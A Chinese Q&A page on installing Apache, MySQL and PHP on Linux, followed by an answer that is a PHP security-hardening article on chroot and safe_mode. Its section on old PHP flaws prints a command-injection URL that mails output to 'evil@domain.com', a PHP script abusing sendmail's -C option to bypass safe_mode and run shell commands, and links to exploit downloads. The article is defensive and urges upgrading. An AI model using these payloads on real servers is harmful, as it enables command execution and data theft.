永发信息网

高手快来!如何在LIUNX系统下配置PHP网站和站点

答案:2  悬赏:80  手机版
解决时间 2021-04-11 21:05

1.怎样在liunx服务器下配置PHP网站(PHP环境以配好 apache 2.2.3 mysql 5.0.22 php 5.1.6)配置的步骤尽量说的具体点
2. 把网站放在哪个文件里
3.怎样在liunx下把网站传到网上

是不是直接传到网上就可以运行了 什么都不用配置了

最佳答案

一、Apache的安装
1、tar xvzf httpd-* -C /usr/local/src/
2、cd /usr/local/src
3、./configure --prefix=/usr/local/apache2
--enable-so --enable-rewrite
4、make;make install
5、/usr/local/apache2/bin/apachectl start

二、Mysql的安装
1、tar xvzf mysql-* -C /usr/local
2、cd /usr/local
ln -s mysql-* mysql
3、groupadd -g 200 mysql
4、useradd -u 200 -g mysql -d /usr/local/mysql/data/ -M mysql
5、mkdir /var/lib/mysql
6、chown -R mysql:mysql /var/lib/mysql
chown -R root:mysql /usr/local/mysql-*
chown -R mysql:mysql /usr/local/mysql/data
7、cp /usr/local/mysql/support-files/my-medium.cnf /etc/my.cnf
8、./usr/local/mysql/scripts/mysql_install_db
chown -R mysql:mysql /var/lib/mysql
chown -R mysql:mysql /usr/local/mysql/data
9、/usr/local/mysql/bin/mysqld_safe --user=mysql &
10、/usr/local/mysql/bin/mysqladmin -u root password 'myrootpw'
11、/usr/local/mysql/bin/mysql -u root -p

三、PHP的安装
1、tar xvjf php-* -C /usr/local/src/
2、cd /usr/local/src/php-*
./configure --prefix=/usr/local/php5 \
--with-apxs2=/usr/local/apache2/bin/apxs \
--with-mysql=/usr/local/mysql \
--with-config-file-path=/usr/local/php5
3、make;make install
4、cp php.ini-dist /usr/local/php5/php.ini
5、vi /usr/local/apache2/htdocs/test.php
<?php
phpinfo( );
?>


apache服务器的设置:
1、vi /usr/local/apache2/conf/httpd.conf
添加:AddType application/x-httpd-php .php
修改:DirectoryIndex index.html index.php
2、apachectl stop apachectl start
3、客户端测试: http://192.168.1.50/test.php

全部回答
一、Web服务器安全

  PHP其实不过是Web服务器的一个模块功能,所以首先要保证Web服务器的安全。当然Web服务器要安全又必须是先保证系统安全,这样就扯远了,无穷无尽。PHP可以和各种Web服务器结合,这里也只讨论Apache。非常建议以chroot方式安装启动Apache,这样即使Apache和PHP及其脚本出现漏洞,受影响的也只有这个禁锢的系统,不会危害实际系统。但是使用chroot的Apache后,给应用也会带来一定的麻烦,比如连接mysql时必须用127.0.0.1地址使用tcp连接而不能用localhost实现socket连接,这在效率上会稍微差一点。还有mail函数发送邮件也是个问题,因为php.ini里的:

[mail function] ; For Win32 only. SMTP = localhost ; For Win32 only. sendmail_from = me@localhost.com

  都是针对Win32平台,所以需要在chroot环境下调整好sendmail。

  二、PHP本身问题

  1、远程溢出

PHP-4.1.2以下的所有版本都存在文件上传远程缓冲区溢出漏洞,而且攻击程序已经广泛流传,成功率非常高:

http://packetstormsecurity.org/0204-exploits/7350fun

http://hsj.shadowpenguin.org/misc/php3018_exp.txt

  2、远程拒绝服务

PHP-4.2.0和PHP-4.2.1存在PHP multipart/form-data POST请求处理远程漏洞,虽然不能获得本地用户权限,但是也能造成拒绝服务。

  3、safe_mode绕过漏洞

  还有PHP-4.2.2以下到PHP-4.0.5版本都存在PHP mail函数绕过safe_mode限制执行命令漏洞,4.0.5版本开始mail函数增加了第五个参数,由于设计者考虑不周可以突破safe_mode的限制执行命令。其中4.0.5版本突破非常简单,只需用分号隔开后面加shell命令就可以了,比如存在PHP脚本evil.php:

<? mail("foo@bar,"foo","bar","",$bar); ?>

  执行如下的URL:

http://foo.com/evil.php?bar=;/usr/bin/id|mail evil@domain.com

  这将id执行的结果发送给evil@domain.com。

  对于4.0.6至4.2.2的PHP突破safe_mode限制其实是利用了sendmail的-C参数,所以系统必须是使用sendmail。如下的代码能够突破safe_mode限制执行命令:

<? # 注意,下面这两个必须是不存在的,或者它们的属主和本脚本的属主是一样 $script="/tmp/script123"; $cf="/tmp/cf123"; $fd = fopen($cf, "w"); fwrite($fd, "OQ/tmp Sparse=0 R$*" . chr(9) . "$#local $@ $1 $: $1 Mlocal, P=/bin/sh, A=sh $script"); fclose($fd); $fd = fopen($script, "w"); fwrite($fd, "rm -f $script $cf; "); fwrite($fd, $cmd); fclose($fd); mail("nobody", "", "", "", "-C$cf"); ?>

  还是使用以上有问题版本PHP的用户一定要及时升级到最新版本,这样才能消除基本的安全问题。

  三、PHP本身的安全配置

  PHP的配置非常灵活,可以通过php.ini, httpd.conf, .htaccess文件(该目录必须设置了AllowOverride All或Options)进行设置,还可以在脚本程序里使用ini_set()及其他的特定的函数进行设置。通过phpinfo()和get_cfg_var()函数可以得到配置选项的各个值。

  如果配置选项是唯一PHP_INI_SYSTEM属性的,必须通过php.ini和httpd.conf来修改,它们修改的是PHP的Master值,但修改之后必须重启apache才能生效。其中php.ini设置的选项是对Web服务器所有脚本生效,httpd.conf里设置的选项是对该定义的目录下所有脚本生效。

  如果还有其他的PHP_INI_USER, PHP_INI_PERDIR, PHP_INI_ALL属性的选项就可以使用.htaccess文件设置,也可以通过在脚本程序自身用ini_set()函数设定,它们修改的是Local值,改了以后马上生效。但是.htaccess只对当前目录的脚本程序生效,ini_set()函数只对该脚本程序设置ini_set()函数以后的代码生效。各个版本的选项属性可能不尽相同,可以用如下命令查找当前源代码的main.c文件得到所有的选项,以及它的属性:

# grep PHP_INI_ /PHP_SRC/main/main.c

  在讨论PHP安全配置之前,应该好好了解PHP的safe_mode模式。

  1、safe_mode

  safe_mode是唯一PHP_INI_SYSTEM属性,必须通过php.ini或httpd.conf来设置。要启用safe_mode,只需修改php.ini:

  safe_mode = On

  或者修改httpd.conf,定义目录:

<Directory /var http://xue163.com/www> Options FollowSymLinks php_admin_value safe_mode 1 </Directory>

  重启apache后safe_mode就生效了。启动safe_mode,会对许多PHP函数进行限制,特别是和系统相关的文件打开、命令执行等函数。

  所有操作文件的函数将只能操作与脚本UID相同的文件,比如test.php脚本的内容为:

  <?include("index.html")?>

  几个文件的属性如下:

# ls -la total 13 drwxr-xr-x 2 root root 104 Jul 20 01:25 . drwxr-xr-x 16 root root 384 Jul 18 12:02 .. -rw-r--r-- 1 root root 4110 Oct 26 2002 index.html -rw-r--r-- 1 www-data www-data 41 Jul 19 19:14 test.php

  在浏览器请求test.php会提示如下的错误信息:

Warning: SAFE MODE Restriction in effect. The script whose uid/gid is 33/33 is not allowed to access ./index.html owned by uid/gid 0/0 in /var http://xue163.com/www/test.php on line 1

  如果被操作文件所在目录的UID和脚本UID一致,那么该文件的UID即使和脚本不同也可以访问的,不知这是否是PHP的一个漏洞还是另有隐情。所以php脚本属主这个用户最好就只作这个用途,绝对禁止使用root做为php脚本的属主,这样就达不到safe_mode的效果了。

  如果想将其放宽到GID比较,则打开 safe_mode_gid可以考虑只比较文件的GID,可以设置如下选项:

  safe_mode_gid = On

 设置了safe_mode以后,所有命令执行的函数将被限制只能执行php.ini里safe_mode_exec_dir指定目录里的程序,而且shell_exec、`ls -l`这种执行命令的方式会被禁止。如果确实需要调用其它程序,可以在php.ini做如下设置:

safe_mode_exec_dir = /usr/local/php/exec

  然后拷贝程序到该目录,那么php脚本就可以用system等函数来执行该程序。而且该目录里的shell脚本还是可以调用其它目录里的系统命令。

  safe_mode_include_dir string

  当从此目录及其子目录(目录必须在 include_path 中或者用完整路径来包含)包含文件时越过 UID/GID 检查。

  从 PHP 4.2.0 开始,本指令可以接受和 include_path 指令类似的风格用分号隔开的路径,而不只是一个目录。

  指定的限制实际上是一个前缀,而非一个目录名。这也就是说“safe_mode_include_dir = /dir/incl”将允许访问“/dir/include”和“/dir/incls”,如果它们存在。如果您希望将访问控制在一个指定的目录,那么请在结尾加上一个斜线,例如:“safe_mode_include_dir = /dir/incl/”。

safe_mode_allowed_env_vars string

  设置某些环境变量可能是潜在的安全缺口。本指令包含有一个逗号分隔的前缀列表。在安全模式下,用户只能改变那些名字具有在这里提供的前缀的环境变量。默认情况下,用户只能设置以 PHP_ 开头的环境变量(例如 PHP_FOO = BAR)。

  注: 如果本指令为空,PHP 将使用户可以修改任何环境变量!

safe_mode_protected_env_vars string

  本指令包含有一个逗号分隔的环境变量的列表,最终用户不能用 putenv() 来改变这些环境变量。甚至在 safe_mode_allowed_env_vars 中设置了允许修改时也不能改变这些变量。

  虽然safe_mode不是万能的(低版本的PHP可以绕过),但还是强烈建议打开安全模式,在一定程度上能够避免一些未知的攻击。不过启用safe_mode会有很多限制,可能对应用带来影响,所以还需要调整代码和配置才能和谐。被安全模式限制或屏蔽的函数可以参考PHP手册。

  讨论完safe_mode后,下面结合程序代码实际可能出现的问题讨论如何通过对PHP服务器端的配置来避免出现的漏洞。

我要举报
如以上问答信息为低俗、色情、不良、暴力、侵权、涉及违法等信息,可以点下面链接进行举报!
大家都在看
刘德华的歌好不好听?
华仔最好听的歌是什么歌?
关于等离子车的问题
为什么QQ更改密码的时候输入的二级密码保护答
形容秋天阴雨天气的句子
---Excuseme.Isthereaparkhere?---________
笑乐园农家乐在哪里啊,我有事要去这个地方
北京买三叶草专柜都不支持邮购?
奥数题求答案
为什么在QQ牧场里卖完了东西却没有金币呢?
办升学酒忌什么,又宜什么
有什么办法能让自己不去想不开心的事、装作什
办黄钻多少钱?
DNF我总感觉我没进步
关于小动物的作文250个字到300个字左右
推荐资讯
手机导航七个小时大概要多少兆流量
女的对男的莫明生气,没见过面的 这是为什么
WAR3UD打ORC除了蜘蛛流和毁灭还有什么较可行
民事赔偿不给钱怎么办,民事案件法院判决赔偿
如果一个人开始对你很冷淡,怎么办?
诺基亚5300
纳米汗蒸养生馆(润富花园店)地址在什么地方,
急需QQ炫舞自定义戒指的图
Let help you.A. IB. meC. myDmine
–Did you find your new dictionary?---Yes.
风雨如磐的意思是什么,风雨如磐什么意思
有点感冒,没什么症状,就是头疼,怎么办?
正方形一边上任一点到这个正方形两条对角线的
阴历怎么看 ?